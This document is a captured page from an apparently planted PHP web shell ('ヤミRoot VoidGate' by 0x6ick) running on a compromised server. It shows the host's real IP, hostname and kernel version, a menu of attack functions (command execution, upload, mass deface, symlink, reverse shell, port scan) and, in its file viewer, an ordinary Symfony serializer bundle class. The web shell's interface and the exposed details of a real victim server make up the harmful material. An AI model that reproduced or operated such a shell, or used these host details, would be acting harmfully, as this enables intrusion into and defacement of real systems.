ヤミRoot VoidGate
User / IP
:
216.73.216.143
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
logercm
/
dev.loger.cm
/
vendor
/
jms
/
serializer-bundle
/
Viewing: JMSSerializerBundle.php
<?php namespace JMS\SerializerBundle; use JMS\SerializerBundle\DependencyInjection\Compiler\AdjustDecorationPass; use JMS\SerializerBundle\DependencyInjection\Compiler\CustomHandlersPass; use JMS\SerializerBundle\DependencyInjection\Compiler\DoctrinePass; use JMS\SerializerBundle\DependencyInjection\Compiler\AssignVisitorsPass; use JMS\SerializerBundle\DependencyInjection\Compiler\ExpressionFunctionProviderPass; use JMS\SerializerBundle\DependencyInjection\Compiler\FormErrorHandlerTranslationDomainPass; use JMS\SerializerBundle\DependencyInjection\Compiler\RegisterEventListenersAndSubscribersPass; use JMS\SerializerBundle\DependencyInjection\Compiler\TwigExtensionPass; use Symfony\Component\DependencyInjection\Compiler\PassConfig; use Symfony\Component\DependencyInjection\ContainerBuilder; use Symfony\Component\HttpKernel\Bundle\Bundle; class JMSSerializerBundle extends Bundle { public function build(ContainerBuilder $builder): void { $builder->addCompilerPass(new AssignVisitorsPass(), PassConfig::TYPE_BEFORE_OPTIMIZATION); // Should run before Symfony\Bundle\TwigBundle\DependencyInjection\Compiler\TwigEnvironmentPass $builder->addCompilerPass(new TwigExtensionPass(), PassConfig::TYPE_BEFORE_OPTIMIZATION, 10); $builder->addCompilerPass(new FormErrorHandlerTranslationDomainPass()); $builder->addCompilerPass(new ExpressionFunctionProviderPass()); $builder->addCompilerPass(new DoctrinePass()); $builder->addCompilerPass(new RegisterEventListenersAndSubscribersPass(), PassConfig::TYPE_OPTIMIZE); $builder->addCompilerPass(new CustomHandlersPass(), PassConfig::TYPE_OPTIMIZE); $builder->addCompilerPass(new AdjustDecorationPass(), PassConfig::TYPE_BEFORE_OPTIMIZATION, -100); } }
Coded With 💗 by
0x6ick